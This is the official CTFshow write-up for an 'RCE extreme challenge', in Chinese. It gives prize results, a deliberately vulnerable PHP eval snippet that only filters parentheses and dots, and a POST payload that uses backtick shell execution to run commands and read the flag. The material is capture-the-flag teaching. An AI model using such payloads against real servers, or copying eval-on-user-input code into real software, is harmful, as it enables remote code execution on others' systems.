CTFshow用户6420
CTFshow-RCE极限大挑战官方wp
输入“/”快速插入内容
CTFshow-RCE极限大挑战官方wp
CTFshow-RCE极限大挑战官方wp
最终结果
题目 | 人数 | 总赏金 | 每人赏金 |
RCE1 | 261 | 100 | 0.3831 |
RCE2 | 109 | 100 | 0.9174 |
RCE3 | 49 | 100 | 2.0408 |
RCE4 | 45 | 100 | 2.2222 |
RCE5 | 11 | 100 | 9.0909 |
| | | |
题目完成统计截止时间:2022年11月20日20时
领取赏金时,使用平台绑定QQ联系客服小姐姐:3525465594
RCE1
•
挑战难度:★
•
本周擂主:g4
•
挑战奖励:截至11月20日晚8点,做出来的人平分奖金(做出来的人越多,奖金越低,反之,越高)
•
关卡奖金:100人民币
题目代码
代码块
<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","括号",$code);
$code = str_replace(".","点",$code);
eval($code);
?>
简单的过滤了.和(),直接使用不带点和括号的RCE方式就可以了,比如日志文件包含,临时文件包含,或者更直观一点的:
payload
POST发送
代码块
code=echo `$_POST[1]`;&1=cat /f*